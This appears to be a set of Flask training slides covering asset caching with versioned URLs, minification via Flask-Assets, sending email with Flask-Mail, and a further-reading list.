Client-side caching is an important loading-time optimization
Client is told to cache all JS and CS files by setting the Expires: header to point far into the future
Problem: what if the file changes?
Solution: don't reuse the URL
Include some version number in it
See how Flask-Bootstrap does it
Concatenate and minify your JS and CSS files
This avoids issuing multiple requests
Flask-Assets can do it for you

Sending email ⌘

Of course you can use email and smtplib modules manually
Common tasks arise then
Central configuration of SMTP server credentials
Suppressing emails centrally during unit tests or on developers' machines
Solution: Flask-Mail

Further reading ⌘

Flask documentation
SQLAlchemy documentation
WTForms documentation
Flask mailing list
Google is your friend